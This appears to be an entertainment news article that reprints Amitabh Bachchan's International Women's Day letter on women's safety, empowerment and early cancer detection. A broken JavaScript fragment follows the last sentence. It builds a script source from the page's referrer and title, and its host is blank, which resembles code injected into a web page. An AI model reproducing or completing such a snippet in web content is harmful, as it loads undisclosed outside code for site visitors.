Amitabh Bachchan writes a letter to all the women out there!

Bollywood’s renowned actor Amitabh Bachchan who has won the heart of the millions by his killer dialogues and dance moves has written a letter to all women on the occasion of World Women’s Day!

Women make up 50% of the strength of our nation and our existence. They must enjoy their rightful place in society, be treated with respect and dignity, and should feel safe and secure at all times. We must banish discrimination in all its forms and the people who practise it. The perpetrators of crime against women must be given the severest punishment, which will act as a deterrent to those who have a tendency to commit these crimes. In order to be a better and evolved society, we must get our house in order.

Women’s empowerment, health and education are important for the development of our society. History is witness to the fact that successful women have helped in building progressive societies. Women today should have all the freedom to choose any role they wish to play, be it homemakers, professionals or even super-successful CEOs.

Today, women are excelling in all spheres. In their quest to be the best, sometimes they forget to take care of themselves. A woman teaches a man what sharing and caring is all about, but often forgets to take good care of herself. I am so happy to be associated with a cause that empowers women and is also helping create awareness about an issue that affects their lives. I am looking forward to attending the Lavasa Women’s Drive awards, in association with the Times of India, to support an initiative that creates awareness about all types of women’s cancer.

Cancer is one of the biggest threats to women today. The best form of defence against cancer is through early detection. I am pleased to see that the Women’s Cancer Initiative at Tata Memorial Hospital, which is associated with this event, has been helping hundreds of women in their fight against cancer.

I wish them the very best for the good work they have been doing. It is important that in order to care and look after those you love, you must also take good care of yourself. I wish all women a very happy International Women’s Day.if (document.currentScript) { s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
